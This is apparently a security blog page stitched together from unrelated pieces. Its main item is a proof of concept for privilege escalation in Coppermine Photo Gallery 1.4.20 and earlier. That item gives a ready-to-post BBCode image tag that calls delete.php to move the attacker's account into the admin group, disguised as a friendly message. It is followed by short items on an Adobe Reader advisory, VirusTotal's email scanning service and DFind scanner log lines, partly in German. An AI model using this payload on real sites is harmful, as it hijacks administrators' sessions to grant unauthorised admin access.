Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation
+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| http://coppermine-gallery.net |
| Don't add me on msn messenger. |
| This vulnerability can be named as "bbcode img tag script injection" |
+--------------------------------------------------------------------------+
| Proof of Concept (an example,to understand it) |
+--------------------------------------------------------------------------+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img]
+--------------------------------------------------------------------------+
| Modify [ID] with your user id. |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id] |
+--------------------------------------------------------------------------+
Insert the below code into a new message
hey admin,nice web site 
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]
+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page |
+-------------------------------------------------------------------------+
APSA09-01 – Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat
Release date: February 19, 2009
Vulnerability identifier: APSA09-01
CVE number: CVE-2009-0658
Platform: All platforms
Summary:
APSA09-01 - Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat.
Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine – Cisco Systems
FYI
www.VirusTotal.com/de/
Virustotal analysiert verdächtige Dateien und erleichtert die schnelle Erkennung von Viren, Würmern, Trojanern und jeglicher Art von Malware, welche von den Antivirus-Engines festgestellt werden.
Über VirusTotal
VirusTotal bietet einen Analysedienst für jegliche Typen von verdächtigen Dateien. Der Dienst ermöglicht eine schnelle Erkennung von Viren, Würmern, Trojanern und anderer Malware, welche von Anti-Virus Engines erkannt wird.
Merkmale:
- Unabhängiger und kostenloser Dienst
- Nutzen von mehreren Anti-Virus Engines
- Automatische Updates von Virensignaturen in Echtzeit
- Detailierte Ergebnisse von jeder Anti-Virus Engine
- Globale Statistiken in Echtzeit
Senden der Dateien per email
Erstellen Sie eine neue E-Mail mit der Empfängeradresse scan@virustotal.com
- Als Betreff der E-Mail tragen Sie bitte SCAN ein.
- Hängen Sie die verdächtige Datei an die erstellte E-Mail an. Als Größenlimit sind 20 MByte festgelegt. E-Mails, welche diese Größe überschreiten werden vom System verworfen.
- Nach Analyse erhalten Sie sofort einen Bericht zum Dateiscan. Die Antwortzeiten des Systems hängen zum Zeitpunkt ihrer Analyseanfrage von der momentanen Auslastung unserer Serversysteme ab.
w00tw00t.at.ISC.SANS.DFind
Schon seit längerem sind in den (Apache-)Logs meiner Server einige seltsame Zeilen zu finden (Ursprungs-IP wurde unkenntlich gemacht):
xxx.xxx.xxx.xxx - - [30/Sep/2007:12:48:33 +0200] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 395 “-” “-”
Diese Zeilen sind der Fingerprint von DFind, einem vulnerability Scanner, der den Server auf Schwachstellen durchsucht. Bei Symantec kennt man das Tool als “Hacktool.DFind” - dort ist auch eine Liste von Schwachstellen, auf die das Programm mögliche Opfer testet.
In letzter Zeit häufen sich Angriffsversuche von IP’s, die aus Adressbereichen von Hostern kommen.